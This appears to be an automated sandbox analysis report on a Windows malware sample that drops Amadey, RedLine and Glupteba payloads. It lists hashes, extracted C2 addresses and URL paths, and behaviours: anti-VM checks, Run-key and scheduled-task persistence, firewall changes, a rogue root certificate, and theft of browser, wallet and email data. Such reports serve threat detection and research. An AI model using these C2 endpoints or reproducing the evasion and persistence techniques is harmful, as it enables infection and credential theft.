Analysis
-
max time kernel
104s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
31-03-2024 13:56
Static task
static1
Behavioral task
behavioral1
Sample
9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral2
Sample
9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe
Resource
win11-20240221-en
General
-
Target
9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe
-
Size
1.8MB
-
MD5
84f8a62131b758731dac05c1b6ea9354
-
SHA1
9f4c86697c014d0188f21e27f631692a7c6416f8
-
SHA256
9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7
-
SHA512
074b47804c317445e206471d743791714a3bf83ea4f78181f57f0f3643f341bc912e67a78609feaa93fc7a2b46adbec2db1c0cceae323048f0f501fbad35fd89
-
SSDEEP
24576:0HlG42OZ96DtCN2H5yVEhA6ZGw2AvLVImyJGjuXoCWpIGYdaxamraqY8wJPxbiR/:0HleOZ0BbwMjvg2KflzXd92nAYm
Malware Config
Extracted
amadey
4.17
http://185.215.113.32
-
install_dir
00c07260dc
-
install_file
explorgu.exe
-
strings_key
461809bd97c251ba0c0c8450c7055f1d
-
url_paths
/yandex/index.php
Extracted
redline
@OLEH_PSP
185.172.128.33:8970
Extracted
amadey
4.18
http://193.233.132.56
-
install_dir
09fd851a4f
-
install_file
explorha.exe
-
strings_key
443351145ece4966ded809641c77cfa8
-
url_paths
/Pneh2sXQk0/index.php
Extracted
redline
LiveTraffic
4.185.137.132:1632
Signatures
-
Detect ZGRat V1 4 IoCs
resource yara_rule behavioral2/files/0x0002000000025c82-54.dat family_zgrat_v1 behavioral2/memory/2124-70-0x00000000003C0000-0x000000000057C000-memory.dmp family_zgrat_v1 behavioral2/files/0x0002000000025caf-234.dat family_zgrat_v1 behavioral2/files/0x0002000000025cb3-257.dat family_zgrat_v1 -
Glupteba payload 8 IoCs
resource yara_rule behavioral2/memory/1908-866-0x0000000000400000-0x0000000003130000-memory.dmp family_glupteba behavioral2/memory/3348-899-0x0000000000400000-0x0000000003130000-memory.dmp family_glupteba behavioral2/memory/1504-906-0x0000000000400000-0x0000000003130000-memory.dmp family_glupteba behavioral2/memory/3348-980-0x0000000000400000-0x0000000003130000-memory.dmp family_glupteba behavioral2/memory/1504-987-0x0000000000400000-0x0000000003130000-memory.dmp family_glupteba behavioral2/memory/5764-1185-0x0000000000400000-0x0000000003130000-memory.dmp family_glupteba behavioral2/memory/5796-1186-0x0000000000400000-0x0000000003130000-memory.dmp family_glupteba behavioral2/memory/5956-1189-0x0000000000400000-0x0000000003130000-memory.dmp family_glupteba -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
resource yara_rule behavioral2/files/0x0002000000025c8c-96.dat family_redline behavioral2/files/0x0002000000025c89-102.dat family_redline behavioral2/memory/3556-107-0x0000000000B10000-0x0000000000B62000-memory.dmp family_redline behavioral2/memory/2220-113-0x00000000009D0000-0x0000000000A5C000-memory.dmp family_redline behavioral2/files/0x0002000000025ca6-175.dat family_redline behavioral2/files/0x0002000000025caf-234.dat family_redline behavioral2/memory/3792-280-0x0000000000400000-0x0000000000450000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amadka.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 55 4152 rundll32.exe 67 5520 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 3 IoCs
pid Process 2884 netsh.exe 5552 netsh.exe 1600 netsh.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amadka.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amadka.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe -
Executes dropped EXE 27 IoCs
pid Process 2996 explorgu.exe 3528 random.exe 2124 alex1234.exe 3556 propro.exe 2220 Traffic.exe 1748 amadka.exe 2920 redlinepanel.exe 4936 explorha.exe 2420 32456.exe 1600 goldprimeldlldf.exe 2632 NewB.exe 572 swiiiii.exe 1816 Uni400uni.exe 2432 p6u0u9NsFSyRSr6UUKCgAYxB.exe 1908 RS7VMIrsQWdNPWVAW9XF7KXz.exe 3348 zJKj9XrRYEzM0tjHDXgtwLkI.exe 1504 P9SgmBKE6sh3sHzqGHlgHRIR.exe 1688 u1vk.0.exe 1708 GDouWbq38shiSdxpGPfHUTkD.exe 2160 GDouWbq38shiSdxpGPfHUTkD.exe 4208 GDouWbq38shiSdxpGPfHUTkD.exe 4224 GDouWbq38shiSdxpGPfHUTkD.exe 3196 u1vk.1.exe 5112 GDouWbq38shiSdxpGPfHUTkD.exe 5764 zJKj9XrRYEzM0tjHDXgtwLkI.exe 5796 RS7VMIrsQWdNPWVAW9XF7KXz.exe 5956 P9SgmBKE6sh3sHzqGHlgHRIR.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine amadka.exe Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine explorha.exe -
Loads dropped DLL 10 IoCs
pid Process 1744 rundll32.exe 4152 rundll32.exe 1708 GDouWbq38shiSdxpGPfHUTkD.exe 2160 GDouWbq38shiSdxpGPfHUTkD.exe 4208 GDouWbq38shiSdxpGPfHUTkD.exe 4224 GDouWbq38shiSdxpGPfHUTkD.exe 5112 GDouWbq38shiSdxpGPfHUTkD.exe 5520 rundll32.exe 1688 u1vk.0.exe 1688 u1vk.0.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\random.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000873001\\random.exe" explorgu.exe Set value (str) \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\amadka.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1001031001\\amadka.exe" explorgu.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: GDouWbq38shiSdxpGPfHUTkD.exe File opened (read-only) \??\D: GDouWbq38shiSdxpGPfHUTkD.exe File opened (read-only) \??\F: GDouWbq38shiSdxpGPfHUTkD.exe File opened (read-only) \??\D: GDouWbq38shiSdxpGPfHUTkD.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 pastebin.com 18 pastebin.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 73 ipinfo.io 23 ipinfo.io 38 api.myip.com 71 api.myip.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1740 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe 2996 explorgu.exe 1748 amadka.exe 4936 explorha.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2124 set thread context of 2064 2124 alex1234.exe 83 PID 1600 set thread context of 3792 1600 goldprimeldlldf.exe 96 PID 572 set thread context of 3088 572 swiiiii.exe 106 PID 1816 set thread context of 1528 1816 Uni400uni.exe 110 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\explorha.job amadka.exe File created C:\Windows\Tasks\explorgu.job 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5160 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 5028 572 WerFault.exe 101 4908 2432 WerFault.exe 114 1804 1688 WerFault.exe 121 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1vk.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1vk.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1vk.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u1vk.0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u1vk.0.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5148 schtasks.exe 4908 schtasks.exe 5552 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" RS7VMIrsQWdNPWVAW9XF7KXz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" RS7VMIrsQWdNPWVAW9XF7KXz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" RS7VMIrsQWdNPWVAW9XF7KXz.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 propro.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 propro.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6024 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1740 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe 1740 9cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7.exe 2996 explorgu.exe 2996 explorgu.exe 1748 amadka.exe 1748 amadka.exe 4936 explorha.exe 4936 explorha.exe 2220 Traffic.exe 3556 propro.exe 3556 propro.exe 3556 propro.exe 3556 propro.exe 3556 propro.exe 2420 32456.exe 2420 32456.exe 4152 rundll32.exe 4152 rundll32.exe 4152 rundll32.exe 4152 rundll32.exe 4152 rundll32.exe 4152 rundll32.exe 3088 RegAsm.exe 3088 RegAsm.exe 3088 RegAsm.exe 3088 RegAsm.exe 1688 u1vk.0.exe 1688 u1vk.0.exe 2920 redlinepanel.exe 2920 redlinepanel.exe 4152 rundll32.exe 4152 rundll32.exe 4152 rundll32.exe 4152 rundll32.exe 4544 powershell.exe 4544 powershell.exe 3144 powershell.exe 3144 powershell.exe 3792 RegAsm.exe 3792 RegAsm.exe 4232 powershell.exe 4232 powershell.exe 420 powershell.exe 420 powershell.exe 4544 powershell.exe 420 powershell.exe 3144 powershell.exe 4232 powershell.exe 2920 redlinepanel.exe 2920 redlinepanel.exe 2920 redlinepanel.exe 2920 redlinepanel.exe 3792 RegAsm.exe 3792 RegAsm.exe 3792 RegAsm.exe 3792 RegAsm.exe 3348 zJKj9XrRYEzM0tjHDXgtwLkI.exe 3348 zJKj9XrRYEzM0tjHDXgtwLkI.exe 1908 RS7VMIrsQWdNPWVAW9XF7KXz.exe 1908 RS7VMIrsQWdNPWVAW9XF7KXz.exe 1504 P9SgmBKE6sh3sHzqGHlgHRIR.exe 1504 P9SgmBKE6sh3sHzqGHlgHRIR.exe 6048 powershell.exe 6048 powershell.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
